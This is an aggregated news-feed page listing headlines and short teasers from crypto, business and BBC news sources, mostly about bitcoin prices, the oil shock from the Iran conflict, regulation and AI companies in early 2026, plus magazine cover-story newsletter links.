Date of publish: Mon, 09 Mar 2026 15:58:58 +0000

Bitcoin price retags $69K as G7 oil plan hangs in the balance

Bitcoin price retags $69K as G7 oil plan hangs in the balance

Bitcoin managed to avoid losses suffered by global stock markets over oil supply uncertainty, with a 5% relief bounce from its weekly open level.

Bitcoin (BTC) returned to $69,000 at Monday’s Wall Street open with markets in limbo over the Middle East oil crisis.

Key points:

Bitcoin sees a rebound after dropping below $68,000 for the weekly close.

Read more

Article link

Date of publish: Mon, 09 Mar 2026 15:38:26 +0000

XRP holders face $50B in unrealized losses as it trades below $1.40

XRP holders face $50B in unrealized losses as it trades below $1.40

About 60% of XRP's circulating supply trades underwater at $1.35, with spot ETF outflows and weak sentiment weighing on market sentiment.

XRP (XRP) traded at $1.35 on Monday, a 63% drawdown from its multi-year high of $3.66 reached in July 2025. As a result, many XRP holders are sitting on significant unrealized losses, underscoring the risks facing crypto investors in bear markets.

Key takeaways:

XRP’s 63% drawdown from its $3.66 multi-year high has left holders with over $50 billion in unrealized losses.

Read more

Article link

Date of publish: Mon, 09 Mar 2026 15:05:18 +0000

Bithumb faces possible six-month partial suspension in South Korea

Bithumb faces possible six-month partial suspension in South Korea

Crypto exchange Bithumb risks a partial business suspension for negligence around money laundering and customer verification practices, according to local media reports.

Bithumb, South Korea’s second-largest cryptocurrency exchange by trading volume, is reportedly facing a possible partial business suspension of up to six months as regulators step up enforcement over anti-money laundering controls.

South Korea’s Financial Intelligence Unit (FIU) gave Bithumb a preliminary notice of a six-month partial suspension over alleged anti-money laundering and know-your-customer failures under the Act on Reporting and Using Specified Financial Transaction Information, according to local media reports on Monday. The regulator reportedly cited concerns over dealings with unregistered overseas virtual asset service providers and shortcomings in customer due diligence.

The FIU also issued a reprimand warning to Bithumb’s CEO, a warning considered a heavy penalty, which may lead to restrictions on his reappointment or future roles. Regulators are expected to hold a sanctions review later in March before deciding on any final measures. Bithumb told News1 that the action remains at the pre-notification stage and that the scope of any sanctions could still change.

Read more

Article link

Date of publish: Mon, 09 Mar 2026 14:00:37 +0000

Bitcoin to outperform gold soon, FBI busts $46M crypto heist: Hodler’s Digest, Mar. 1 – 7

Lyn Alden explains why Bitcoin will outperform gold in the coming two or three years, FBI cracks down on major crypto crime: Hodler’s Digest

Article link

Date of publish: Sun, 08 Mar 2026 12:25:52 +0000

The debate over Bitcoin’s four-year cycle is over: Benjamin Cowen

This year has proven that anyone arguing Bitcoin’s four-year cycle is over was wrong, says analyst Benjamin Cowen.

Article link

Date of publish: Fri, 06 Mar 2026 14:20:00 +0000

What’s a ‘Network State’ and are there real-life examples? Big Questions

Crypto’s most influential people, including Balaji Srinivasan and Vitalik Buterin, support the concept of a Network State. But what is it?

Article link

Date of publish: Thu, 05 Mar 2026 13:55:47 +0000

Bitcoin may face hard fork over any attempt to freeze Satoshi’s coins

Millions of Bitcoin that can’t be upgraded to post-quantum could be stolen and dumped. What would Satoshi do? He may have left us a clue…

Article link

Date of publish: Wed, 04 Mar 2026 14:13:48 +0000

Telegram avoids Philippines ban, yen carry trade going onchain: Asia Express

Telegram has narrowly escaped a full scale ban in the Philippines, and the yen carry trade now comes in token form. Asia Express s

Article link

Date of publish: Mon, 02 Mar 2026 23:50:57 +0000

Bitcoin bottom signal tips 130% rally, Morgan Stanley to custody crypto: Hodler’s Digest, Feb. 22 – 28

South Korea’s National Tax Service accidentally exposed a crypto wallet seed, Bitcoin may be flashing a bottom signal: Hodler’s Digest

Article link

Date of publish: Mon, 02 Mar 2026 09:13:39 +0000

Would Bitcoin really be at $200K if not for Jane Street? Trade Secrets

There’s a furious debate about Jane Street’s impact on Bitcoin. Is it suppressing the price… or is that just a conspiracy theory?

Article link

Date of publish: Fri, 27 Feb 2026 13:35:29 +0000

AI won’t make you rich but crypto games might, Axie founder steps down: Web3 Gamer 

The founder of Pixels says it’s hard to get rich from AI but there are still big opportunities in Web3 gaming: Web3 Gamer

Article link

Date of publish: Thu, 26 Feb 2026 13:58:25 +0000

Clarity Act risks repeat of Europe’s mistakes, crypto lawyer warns

The US Clarity Act may repeat the same structural mistakes that the European Union made with MiCA, says crypto lawyer Yuriy Brisov.

Article link

Date of publish: Wed, 25 Feb 2026 14:21:09 +0000

Bitcoin faces 6 massive challenges to become quantum secure

Making Bitcoin quantum secure is the biggest challenge the protocol has ever faced. Here are the six biggest obstacles to be overcome.

Article link

Date of publish: Tue, 24 Feb 2026 13:09:23 +0000

Bitdeer sells all Bitcoin, Metaplanet rejects misconduct claims: Asia Express

Bitdeer sells all corporate Bitcoin. SBI to launch corporate bonds as security tokens and reward XRP to investors. Asia Express

Article link

Date of publish: Tue, 24 Feb 2026 07:07:47 +0000

Bitcoin may take 7 years to upgrade to post-quantum: BIP-360 co-author

BIP-360 co-author Ethan Heilman says making Bitcoin to quantum-secure could take 7 years. Recent breakthroughs suggest time is running out.

Article link

Date of publish: Wed, 18 Feb 2026 14:13:25 +0000

Chinese New Year boosts interest, TradFi buying crypto exchanges: Asia Express

Chinese New Year’s digital yuan red packets now come with extra interest, Asia’s tech and fintech giants get FOMO for crypto. Asia Express

Article link

Date of publish: Mon, 16 Feb 2026 21:57:50 +0000

Coinbase misses Q4 earnings, Ethereum eyes ‘V-shaped recovery’: Hodler’s Digest, Feb. 8 – 14

Crypto exchange Coinbase reported a net loss in the fourth quarter of 2025, Ether’s price may rebound: Hodler’s Digest

Article link

Date of publish: Sun, 15 Feb 2026 14:38:25 +0000

Brandt says Bitcoin yet to bottom, Polymarket sees hope: Trade Secrets

Peter Brandt isn’t convinced Bitcoin has bottomed yet, but a significant minority of Polymarket bets suggest there’s some hope: Trade Secrets

Article link

Date of publish: Fri, 13 Feb 2026 13:51:49 +0000

IronClaw rivals OpenClaw, Olas launches bots for Polymarket — AI Eye

Near.AI introduces a secure, private, Rust-based version of OpenClaw called IronClaw, Olas prediction agents unleashed Polymarket. AI Eye.

Article link

Date of publish: Thu, 12 Feb 2026 13:55:46 +0000

Is China hoarding gold so yuan becomes global reserve instead of USD?

Big Questions: Has Beijing been amassing a secret war chest of gold so that it can one day dethrone the US dollar via economic warfare?

Article link

Date of publish: Wed, 11 Feb 2026 13:50:11 +0000

Did a Hong Kong fund kill Bitcoin? Bithumb’s ‘phantom’ BTC: Asia Express

Questions raised after Bithumb intern sent 15X more “phantom” Bitcoin to users than it held. Plus, did a Hong Kong fund blow up? Asia Express

Article link

Date of publish: Mon, 09 Feb 2026 21:21:30 +0000

Bitcoin difficulty plunges, Buterin sells off Ethereum: Hodler’s Digest, Feb. 1 – 7

Ethereum co-founder Vitalik Buterin made a significant move with his Ethereum holdings, Bitcoin mining difficulty plunges: Hodler’s Digest

Article link

Date of publish: Sun, 08 Feb 2026 15:38:09 +0000

Bitcoin’s ‘biggest bull catalyst’ would be Saylor’s liquidation: Santiment founder

Crypto sentiment platform Santiment founder Makim Balashevich reveals the most bullish scenario that could play out for Bitcoin in 2026

Article link

Date of publish: Fri, 06 Feb 2026 14:23:31 +0000

Big questions: Should you sell your Bitcoin for nickels for a 43% profit? 

The metal in a US 5-cent coin is worth 43% more than the coin’s value. So if you sell your BTC for nickels, can you make infinite money?

Article link

Date of publish: Thu, 05 Feb 2026 14:09:52 +0000

South Korea gets rich from crypto… North Korea gets weapons

Crypto trading may be huge in South Korea, but just over the border, crypto hacking accounts for around 13.5% of North Korea’s GDP.

Article link

Date of publish: Wed, 04 Feb 2026 13:19:40 +0000

DAT panic dumps 73,000 ETH, India’s crypto tax stays: Asia Express

Ethereum DAT Trend Research dumps 73,000 ETH, South Korea is now fighting crypto market manipulation with AI. Asia Express

Article link

Date of publish: Mon, 02 Feb 2026 21:17:12 +0000

Bitcoin’s ‘miner exodus,’ UK bans some Coinbase crypto ads: Hodler’s Digest, Jan. 25 – 31

Bitcoin’s ‘miner exodus’ could have an impact on BTC’s price, the UK watchdog clamps down on Coinbase crypto ads: Hodler’s Digest

Article link

Date of publish: Sun, 01 Feb 2026 00:54:03 +0000

Web3 games shuttered, Axie Infinity founder warns more will ‘die’: Web3 Gamer

Axie Infinity founder issues a stern warning for Web3 gaming industry, Scottie Pippen to launch a new game, and more: Web3 Gamer

Article link

Date of publish: Sat, 31 Jan 2026 09:43:37 +0000

Crypto loves Clawdbot/Moltbot, Uber ratings for AI agents: AI Eye

Viral AI assistant Clawdbot/Moltbot learned to speak on its own, and can trade on Polymarket. But it’s a cybersecurity nightmare. AI Eye.

Article link

Date of publish: Thu, 29 Jan 2026 14:20:00 +0000

6 weirdest devices people have used to mine Bitcoin and crypto

Just because you can mine crypto on essentially any device doesn’t mean you should. Check out the wildest Bitcoin mining experiments ever.

Article link

Date of publish: Wed, 28 Jan 2026 14:20:00 +0000

Hong Kong stablecoins in Q1, BitConnect kidnapping arrests: Asia Express

Hong Kong will issue stablecoin licenses this quarter. Two men allegedly linked to the 2018 BitConnect kidnappings arrested. Asia Express

Article link

Date of publish: Mon, 26 Jan 2026 21:20:47 +0000

GameStop ‘likely to sell’ Bitcoin holdings, Ethereum preps for quantum: Hodler’s Digest, Jan. 18 – 24

GameStop just made a significant move with its Bitcoin holdings, Ethereum hones in on post-quantum security: Hodler’s Digest

Article link

Date of publish: Sun, 25 Jan 2026 20:48:38 +0000

News Ticker - markets.businessinsider.com

REalloys Announces Closing of Upsized $50 Million Public Offering

<link type="text/css" rel="stylesheet" href="https://www.globenewswire.com/styles/gnw_nitf.css" /><p align="justify">BOCA RATON, Fla., March 09, 2026 (GLOBE NEWSWIRE) -- REalloys Inc. (NASDAQ: ALOY) (the "Company" or "REalloys"), a U.S.-based mine-to-magnet rare earth company, today announced the closing of its previously announced...

Article link

Date of publish: Mon, 09 Mar 2026 14:43:53 GMT

EQS-PVR: NORMA Group SE: Release according to Article 40, Section 1 of the WpHG [the German Securities Trading Act] with the objective of Europe-wide distribution

<table border="0"><tr><td> EQS Voting Rights Announcement: NORMA Group SE <br/> NORMA Group SE: Release according to Article 40, Section 1 of the WpHG [the German Securities Trading Act] with the objective of Europe-wide distribution <br/><br/> 09.03.2026 / 15:42 CET/CEST<br/> Dissemination of a Voting Rights...

Article link

Date of publish: Mon, 09 Mar 2026 14:42:13 GMT

Pushpay and Barna Group's 2026 State of Church Technology Report Shows Church Tech Has Moved Past Adoption — Now Alignment Is What Matters

<link type="text/css" rel="stylesheet" href="https://www.globenewswire.com/styles/gnw_nitf.css" />REDMOND, Wash., March 09, 2026 (GLOBE NEWSWIRE) -- <a href="https://www.globenewswire.com/Tracker?data=JQwAqRBb9p9uVPS7TPq7RxDDQaxvxen_TJeUMdYSU6wTV8Yr6qnMVmAjdN6hcC3clC-73JsmImyK-1KA-ayXIQ==" rel="nofollow" target="_blank"><u>Pushpay</u></a>, the...

Article link

Date of publish: Mon, 09 Mar 2026 14:40:03 GMT

History shows the economic and market impact of oil's $100 shocker will depend on how long it lasts

Article link

Date of publish: Mon, 09 Mar 2026 14:38:01 GMT

Helio Corporation Secures New Aerospace and Research Contracts, Expanding Revenue Pipeline and Advancing Space-Based Solar Power Technologies

<img src="https://api.newsfilecorp.com/newsinfo/287760/208" id="208" width="2" height="2" style="width: 1px; height: 1px;border: 0px solid;">Berkeley, California--(Newsfile Corp. - March 9, 2026) - Helio Corporation (OTCID: HLEO) ("Helio" or the "Company"), a developer of advanced space power and engineering solutions supporting next-generation...

Article link

Date of publish: Mon, 09 Mar 2026 14:38:00 GMT

Theaus Global and NorthernNations Cooperative Group Announce Strategic Alliance to Advance Scalable, High-Integrity Carbon Pathways Across Alberta’s Oil and Gas Assets

<link type="text/css" rel="stylesheet" href="https://www.globenewswire.com/styles/gnw_nitf.css" /><p align="left">EDMONTON, Alberta, March 09, 2026 (GLOBE NEWSWIRE) -- Theaus Global Inc. ("Theaus Global"), an Alberta-based technology and carbon credit development company, today announced a strategic alliance (the "Carbon Alliance") with...

Article link

Date of publish: Mon, 09 Mar 2026 14:36:34 GMT

TMX Group Opens the Market to Celebrate International Women's Day 2026

<img src="https://api.newsfilecorp.com/newsinfo/287757/208" id="208" width="2" height="2" style="width: 1px; height: 1px;border: 0px solid;">Toronto, Ontario--(Newsfile Corp. - March 9, 2026) - Nicole Rosenberg, Vice President, Governance and Sustainability, TMX Group, alongside the Honourable Caroline Mulroney, President of the Treasury Board...

Article link

Date of publish: Mon, 09 Mar 2026 14:29:00 GMT

CORRECTING & REPLACING -- MBX Biosciences Announces Successful End-of-Phase 2 FDA Meeting and Provides Phase 3 Development Plan for Once-Weekly Canvuparatide for Hypoparathyroidism

<link type="text/css" rel="stylesheet" href="https://www.globenewswire.com/styles/gnw_nitf.css" />In the fourth paragraph, we are replacing <em>milligrams</em> with <em>micrograms</em>. The corrected press release follows.CARMEL, Ind., March 09, 2026 (GLOBE NEWSWIRE) -- MBX Biosciences, Inc. (Nasdaq: MBX), a clinical-stage biopharmaceutical...

Article link

Date of publish: Mon, 09 Mar 2026 14:21:35 GMT

BYD breaks down final barriers to electrification with Blade Battery 2.0 and FLASH Charging

<link type="text/css" rel="stylesheet" href="https://www.globenewswire.com/styles/gnw_nitf.css" /><ul type="disc"><li style="margin-bottom:8pt;">World's most advanced power battery works with world's fastest mass-produced EV charger to make recharging as easy as refuelling </li><li style="margin-bottom:8pt;">1,500kW of charging power achieves...

Article link

Date of publish: Mon, 09 Mar 2026 14:19:24 GMT

Pain medications remain the leading cause of poison centre calls in Canada

<link type="text/css" rel="stylesheet" href="https://www.globenewswire.com/styles/gnw_nitf.css" />TORONTO, March 09, 2026 (GLOBE NEWSWIRE) -- New data being released for National Poison Prevention Week March 15 to 21 show that pain medications remain the No. 1 cause of calls to Canada’s five poison centres for all ages. Contrary to common...

Article link

Date of publish: Mon, 09 Mar 2026 14:18:40 GMT

BBC News

Energy prices fall and stocks rise after Trump says Iran war 'very complete'

The US president's comments lead to a drop in crude costs and a rebound in shares.

Article link

Date of publish: Tue, 10 Mar 2026 09:05:05 GMT

How the Iran war may affect your money and bills

The conflict in the Middle East could raise the cost of petrol, household energy bills and even food.

Article link

Date of publish: Tue, 10 Mar 2026 10:20:12 GMT

China exports surge despite Trump tariffs

Official data shows shipments rose by 20% this year with growth in European and other Asia markets.

Article link

Date of publish: Tue, 10 Mar 2026 06:16:02 GMT

Reeves pledges to explore helping with heating oil bills

The chancellor said a meeting on Wednesday will explore ways to help households.

Article link

Date of publish: Tue, 10 Mar 2026 03:30:50 GMT

Faisal Islam: Trump comments may have eased oil price surge, but havoc remains

It has been the most volatile day of oil trading in world history, and there is much still to play out.

Article link

Date of publish: Tue, 10 Mar 2026 00:48:12 GMT

GPS jamming: The invisible battle in the Middle East

GPS jamming has made navigation hazardous in the Gulf, spurring efforts to develop alternatives.

Article link

Date of publish: Tue, 10 Mar 2026 00:01:38 GMT

Why the price of oil matters more than you might think

A shock to oil supplies is rattling financial markets, driving up prices at the pump and raising fears of a bigger economic hit.

Article link

Date of publish: Mon, 09 Mar 2026 21:44:23 GMT

G7 to take 'necessary measures' to support energy supplies

Finance ministers and the IEA discussed options for stabilising oil prices which surpassed $100.

Article link

Date of publish: Mon, 09 Mar 2026 23:30:46 GMT

Six ways the Iran war could affect you - in charts

With fuel and gas prices having risen in recent days, here are some ways the conflict could affect households.

Article link

Date of publish: Mon, 09 Mar 2026 12:53:49 GMT

How high could UK petrol and diesel prices go?

For every $10 rise in oil prices, motorists face paying roughly 7p per litre more in the UK.

Article link

Date of publish: Mon, 09 Mar 2026 11:22:56 GMT

Anthropic sues US government for calling it a risk

The artificial intelligence company has been in a public fight with US government leaders over use of its tools like Claude

Article link

Date of publish: Mon, 09 Mar 2026 21:33:05 GMT

Asia governments to cap fuel prices as oil costs jump

The price of crude has surged above $100 on concerns about shortages due to supply disruptions.

Article link

Date of publish: Mon, 09 Mar 2026 09:44:09 GMT

London mayor courts embattled AI firm Anthropic

The letter from London's mayor came as the US moved to designate the company a supply chain risk.

Article link

Date of publish: Fri, 06 Mar 2026 21:49:18 GMT

Flight paths squeezed as Iran conflict closes more airspace

A drone attack on Azerbaijan has narrowed choices for airlines scrambling to respond to disruption in the Gulf.

Article link

Date of publish: Fri, 06 Mar 2026 18:09:19 GMT

There’s an inflation wave coming - what does the Iran war mean for the UK economy?

Economic consequences are an intrinsic aspect of the Iran conflict, writes BBC economics editor Faisal Islam.

Article link

Date of publish: Sat, 07 Mar 2026 04:02:08 GMT

US economy unexpectedly sheds 92,000 jobs in February

The contraction came as a surprise with payrolls down in nearly every sector.

Article link

Date of publish: Fri, 06 Mar 2026 14:50:36 GMT

Axel Springer agrees to buy Telegraph Media Group in £575m deal

Last year the Daily Mail and General Trust proposed to buy the company in a £500m takeover.

Article link

Date of publish: Fri, 06 Mar 2026 18:00:47 GMT

Price of first class stamps to rise to £1.80

Royal Mail says the increase reflects the rise in delivery costs, but the move angers consumer groups.

Article link

Date of publish: Fri, 06 Mar 2026 13:12:02 GMT

Surge in jet fuel prices could push up air fares, analysts warn

Disruption to supplies from the Gulf due to the Middle East conflict has pushed the cost up by more than 80%.

Article link

Date of publish: Fri, 06 Mar 2026 15:51:05 GMT

Oil price at two-year high after Qatar warns all Gulf production could stop within days

Energy Minister Saad al-Kaabi says oil could hit $150 a barrel if the Iran conflict continues over the coming weeks.

Article link

Date of publish: Fri, 06 Mar 2026 23:14:33 GMT

Lenders lift mortgage rates as Iran war hits borrowing costs

Nationwide, HSBC and Coventry Building Society are all putting some mortgage rates up.

Article link

Date of publish: Fri, 06 Mar 2026 11:21:32 GMT

Emirates resumes some Dubai flights – what's the latest on travel to UK?

New flights to the UK from the Middle East follow days of widespread air travel disruption since late February which has left many Britons stranded.

Article link

Date of publish: Sat, 07 Mar 2026 05:04:33 GMT

One in 7 shops in UK has turned cashless in the past year, survey finds

Some 14% of small High Street traders have gone card only in the last year, a survey suggests.

Article link

Date of publish: Fri, 06 Mar 2026 00:05:41 GMT

US eases sanctions on Russian oil sales to India during Iran conflict

Treasury Secretary Scott Bessent gives India a 30-day waiver to buy Russian crude as a "stop gap measure".

Article link

Date of publish: Fri, 06 Mar 2026 07:11:25 GMT

Anthropic vows to sue Pentagon over supply chain risk label

The supply chain risk designation of the artificial intelligence firm is a first for a US company.

Article link

Date of publish: Fri, 06 Mar 2026 02:46:30 GMT

Spain's migrants welcome amnesty: 'It will help us in every way'

Madrid cites humanitarian and economic reasons to give undocumented workers legal status.

Article link

Date of publish: Mon, 09 Mar 2026 00:17:54 GMT

Can snacks help you sleep?

Chocolates, bars, gummies and drinks promise to help you sleep, but is the science behind them sound?

Article link

Date of publish: Fri, 06 Mar 2026 00:05:51 GMT

We have more privacy controls yet less privacy than ever

Has online privacy become "a luxury not a right" for us all in 2026?

Article link

Date of publish: Thu, 05 Mar 2026 00:04:26 GMT

Know when to fold them: the tech inspired by origami

Origami techniques can add strength to structures without adding bulk.

Article link

Date of publish: Tue, 03 Mar 2026 05:45:46 GMT

Deepfake attack: 'Many people could have been cheated'

The boss of the Bombay Stock Exchange was recently targeted in what is a growing global problem.

Article link

Date of publish: Mon, 02 Mar 2026 06:47:00 GMT

Why you can't get a signal at festivals and sports matches

Connecting up music and sports events to the internet is a massive undertaking.

Article link

Date of publish: Fri, 27 Feb 2026 00:03:10 GMT

The family-owned soda firm that still uses returnable glass bottles

Soft drinks company Twig's Beverage has a loyal following for its old-fashioned approach.

Article link

Date of publish: Thu, 26 Feb 2026 00:06:33 GMT

Orbital space race heats up in Arctic north

Europe lags far behind the US and China in orbital space launches, but new facilities are opening up.

Article link

Date of publish: Tue, 24 Feb 2026 00:10:05 GMT

Are you cut out for living and working in Antarctica?

Jobs are available on the icy continent for chefs, plumbers, carpenters and even hairdressers.

Article link

Date of publish: Mon, 23 Feb 2026 00:01:56 GMT

How do you modernise mango farming?

India's mango farmers are being urged to innovate as climate change makes cultivation "unpredictable".

Article link

Date of publish: Fri, 20 Feb 2026 00:05:20 GMT

The two farms in Senegal that supply many of the UK's vegetables

During winter in Britain fresh produce is sent by cargo ship from the West African nation every week.

Article link

Date of publish: Thu, 19 Feb 2026 00:16:54 GMT

Reddit's human content wins amid the AI flood

Reddit says its human contributors are valued amid an internet awash with AI-generated content.

Article link

Date of publish: Tue, 17 Feb 2026 00:03:10 GMT

Trump eyes Venezuela visit – but obstacles to his oil plan remain

The US president wants American energy firms to start extracting the crude but they are reluctant.

Article link

Date of publish: Mon, 16 Feb 2026 09:50:58 GMT

Get a grip: Robotics firms struggle to develop hands

Developing a durable and affordable hand is one of the biggest challenges in robotics.

Article link

Date of publish: Fri, 13 Feb 2026 00:04:16 GMT

Who is billionaire Sir Jim Ratcliffe and how did he make his money?

The industrialist and Manchester United co-owner has apologised over comments he made about immigration.

Article link

Date of publish: Thu, 12 Feb 2026 14:11:55 GMT

The US economy is growing - so where are all the jobs?

As hiring rates and job openings drop, some worry a tough job market could be here to stay.

Article link

Date of publish: Fri, 13 Feb 2026 00:05:12 GMT

The Dutch love four-day working weeks, but are they sustainable?

The Netherlands has the lowest working hours in Europe, but some say it is harming its economy.

Article link

Date of publish: Thu, 12 Feb 2026 00:00:05 GMT

Why food fraud persists, even with improving tech

Even with sophisticated technology it is still difficult to detect fake foods.

Article link

Date of publish: Tue, 10 Feb 2026 00:03:12 GMT

How the Iran war may affect your money and bills

The conflict in the Middle East could raise the cost of petrol, household energy bills and even food.

Article link

Date of publish: Tue, 10 Mar 2026 10:20:12 GMT

How worried are Americans about rising petrol prices?

The BBC spoke to New Yorkers about how the conflict in Iran is driving up prices at the pump - and how it's impacting their wallets.

Article link

Date of publish: Tue, 10 Mar 2026 01:05:39 GMT

Iran war impacts heating oil bills for homeowners

Some residents say they have seen prices more than double since the conflict started.

Article link

Date of publish: Mon, 09 Mar 2026 16:02:49 GMT

Rural households feel the pinch of war in Iran

North Yorkshire residents using oil tanks to fuel their homes say bills are soaring.

Article link

Date of publish: Mon, 09 Mar 2026 14:34:27 GMT

Six ways the Iran war could affect you - in charts

With fuel and gas prices having risen in recent days, here are some ways the conflict could affect households.

Article link

Date of publish: Mon, 09 Mar 2026 12:53:49 GMT

The real impact of roadworks on the country - and why they're set to get worse

There is a fine balance between the benefits of improved infrastructure, versus the cost of disruption. Does the country have it right?

Article link

Date of publish: Sun, 11 Jan 2026 01:26:18 GMT

Why the railways often seem to be in such chaos over Christmas

Parts of Britain’s rail network will close for engineering work over the festive period - but is that the right time to do it?

Article link

Date of publish: Mon, 22 Dec 2025 00:03:12 GMT

Budget 2025: What's the best and worst that could happen for Labour?

Three days in, after a tax U-turn and partial climbdown on workers' rights, Laura Kuenssberg looks at what impact Budget week might have.

Article link

Date of publish: Sat, 29 Nov 2025 15:14:47 GMT

Has Britain's budget watchdog become too all-powerful?

Ahead of this week's Budget, some have accused the Office for Budget Responsibility of being a "straitjacket on growth"

Article link

Date of publish: Tue, 25 Nov 2025 00:00:03 GMT

The curious case of why Poundland is struggling during a cost-of-living crisis

Why - in an age where so many of us are feeling the financial pinch - are some budget shops on UK high streets having such a tough time?

Article link

Date of publish: Fri, 21 Nov 2025 08:03:37 GMT

What in the World

Iran says it has closed the vital shipping channel to global trade.

Article link

Date of publish: Fri, 06 Mar 2026 14:30:00 GMT

Wales' richest man says Britain is 'uncomfortable place' for Jews

The billionaire says "anti-semitism is always in the air" with parallels to the persecution his ancestors faced.

Article link

Date of publish: Tue, 03 Mar 2026 07:53:29 GMT

Edible Economics by Ha-Joon Chang (Omnibus)

Professor Ha-Joon Chang, “a hungry economist” explores why economics matters.

Article link

Date of publish: Sat, 28 Feb 2026 08:45:00 GMT

Why you should consider fixing your energy tariff now

Martin Lewis explains what the upcoming change to the energy price cap means for your bills.

Article link

Date of publish: Fri, 27 Feb 2026 11:58:25 GMT

'Is this all bad debt or good debt?'

Karen has not only left the family in emotional turmoil but also in serious debt.

Article link

Date of publish: Thu, 26 Feb 2026 18:49:43 GMT

The world this week

Cover Story newsletter: A war without a strategy

An exclusive look at how we designed this week’s cover

Article link

Date of publish: Fri, 06 Mar 2026 18:03:29 +0000

The weekly cartoon

Article link

Date of publish: Thu, 05 Mar 2026 13:45:01 +0000

Business

Article link

Date of publish: Thu, 05 Mar 2026 13:45:01 +0000

Politics

Article link

Date of publish: Thu, 05 Mar 2026 13:45:01 +0000

Cover Story newsletter: The daunting quest for critical minerals

An exclusive look at how we designed this week’s covers

Article link

Date of publish: Mon, 02 Mar 2026 15:56:58 +0000

The weekly cartoon

Article link

Date of publish: Thu, 26 Feb 2026 13:56:23 +0000

Business

Article link

Date of publish: Thu, 26 Feb 2026 13:56:23 +0000

Politics

Article link

Date of publish: Thu, 26 Feb 2026 13:56:23 +0000

Cover Story newsletter: Putin’s forever war

An exclusive look at how we designed this week’s covers

Article link

Date of publish: Sat, 21 Feb 2026 17:50:12 +0000

The weekly cartoon

Article link

Date of publish: Thu, 19 Feb 2026 13:47:16 +0000

Politics

Article link

Date of publish: Thu, 19 Feb 2026 13:47:16 +0000

Business

Article link

Date of publish: Thu, 19 Feb 2026 13:47:16 +0000

Cover Story newsletter: The most powerful woman in the world

An exclusive look at how we designed this week’s covers

Article link

Date of publish: Sun, 15 Feb 2026 13:25:45 +0000

The weekly cartoon

Article link

Date of publish: Thu, 12 Feb 2026 13:50:29 +0000

Business

Article link

Date of publish: Thu, 12 Feb 2026 13:50:29 +0000

Politics

Article link

Date of publish: Thu, 12 Feb 2026 13:50:29 +0000

Cover Story newsletter: The dangerous dollar

An exclusive look at how we designed our cover

Article link

Date of publish: Fri, 06 Feb 2026 20:53:46 +0000

The weekly cartoon

Article link

Date of publish: Thu, 05 Feb 2026 13:47:23 +0000

Politics

Article link

Date of publish: Thu, 05 Feb 2026 13:47:23 +0000

Business

Article link

Date of publish: Thu, 05 Feb 2026 13:47:23 +0000

Cover Story newsletter: The ICE test

An exclusive look at how we designed our cover

Article link

Date of publish: Fri, 30 Jan 2026 18:08:25 +0000

The weekly cartoon

Article link

Date of publish: Thu, 29 Jan 2026 13:48:00 +0000

Politics

Article link

Date of publish: Thu, 29 Jan 2026 13:48:00 +0000

Business

Article link

Date of publish: Thu, 29 Jan 2026 13:48:00 +0000

Cover Story: The true danger posed by Donald Trump

An exclusive look at how we designed our cover

Article link

Date of publish: Fri, 23 Jan 2026 21:18:08 +0000

Business

Article link

Date of publish: Thu, 22 Jan 2026 14:07:39 +0000

The weekly cartoon

Article link

Date of publish: Thu, 22 Jan 2026 14:07:39 +0000

Politics

Article link

Date of publish: Thu, 22 Jan 2026 14:07:39 +0000

Cover Story newsletter: The return of gunboat capitalism

An exclusive look at how we designed our cover

Article link

Date of publish: Fri, 16 Jan 2026 15:50:53 +0000

The weekly cartoon

Article link

Date of publish: Thu, 15 Jan 2026 13:51:54 +0000

Politics

Article link

Date of publish: Thu, 15 Jan 2026 13:51:54 +0000

Business

Article link

Date of publish: Thu, 15 Jan 2026 13:51:54 +0000

Cover Story newsletter: The Donroe Delusion

An exclusive look at how we designed our cover

Article link

Date of publish: Fri, 09 Jan 2026 15:46:13 +0000

The weekly cartoon

Article link

Date of publish: Thu, 08 Jan 2026 13:47:50 +0000

Business

Article link

Date of publish: Thu, 08 Jan 2026 13:47:50 +0000

Politics

Article link

Date of publish: Thu, 08 Jan 2026 13:47:50 +0000

Cover Story newsletter: The angst over affordability

An exclusive look at how we designed our cover

Article link

Date of publish: Wed, 31 Dec 2025 14:09:18 +0000

The weekly cartoon

Article link

Date of publish: Tue, 30 Dec 2025 13:48:47 +0000

The world this week

Article link

Date of publish: Tue, 30 Dec 2025 13:48:47 +0000

The weekly cartoon

Article link

Date of publish: Thu, 25 Dec 2025 15:10:02 +0000

Cover Story newsletter: Illustrating our Christmas issue

An exclusive look at how we designed our cover, written by Josie Delap, our Christmas editor

Article link

Date of publish: Fri, 19 Dec 2025 12:24:24 +0000

The weekly cartoon

Article link

Date of publish: Thu, 18 Dec 2025 13:43:14 +0000

The world this year 2025

Article link

Date of publish: Thu, 18 Dec 2025 13:43:14 +0000

Cover Story newsletter: Can anyone stop Europe’s populist right?

An exclusive look at how we designed our cover

Article link

Date of publish: Fri, 12 Dec 2025 17:19:36 +0000

The weekly cartoon

Article link

Date of publish: Thu, 11 Dec 2025 14:00:15 +0000

Business

Article link

Date of publish: Thu, 11 Dec 2025 14:00:15 +0000

Politics

Article link

Date of publish: Thu, 11 Dec 2025 14:00:15 +0000

Cover Story newsletter: How AI is rewiring childhood

An exclusive look at how we designed our cover

Article link

Date of publish: Sat, 06 Dec 2025 13:28:07 +0000

The weekly cartoon

Article link

Date of publish: Thu, 04 Dec 2025 14:20:05 +0000

Politics

Article link

Date of publish: Thu, 04 Dec 2025 14:20:05 +0000

Business

Article link

Date of publish: Thu, 04 Dec 2025 14:20:05 +0000

Cover Story newsletter: What China will dominate next

How we chose this week’s image

Article link

Date of publish: Fri, 28 Nov 2025 17:30:47 +0000

Business

Article link

Date of publish: Thu, 27 Nov 2025 14:06:34 +0000

The weekly cartoon

Article link

Date of publish: Thu, 27 Nov 2025 14:06:34 +0000

Politics

Article link

Date of publish: Thu, 27 Nov 2025 14:06:34 +0000

Cover Story newsletter: Welcome to Anything Goes America

How we chose this week’s image

Article link

Date of publish: Mon, 24 Nov 2025 11:08:56 +0000

Business

Article link

Date of publish: Thu, 20 Nov 2025 14:14:37 +0000

The weekly cartoon

Article link

Date of publish: Thu, 20 Nov 2025 14:14:37 +0000

Politics

Article link

Date of publish: Thu, 20 Nov 2025 14:14:37 +0000

Cover Story newsletter: How markets could topple the economy

An exclusive look at how we designed our cover

Article link

Date of publish: Fri, 14 Nov 2025 18:41:52 +0000

The weekly cartoon

Article link

Date of publish: Thu, 13 Nov 2025 14:00:55 +0000

Business

Article link

Date of publish: Thu, 13 Nov 2025 14:00:55 +0000

Politics

Article link

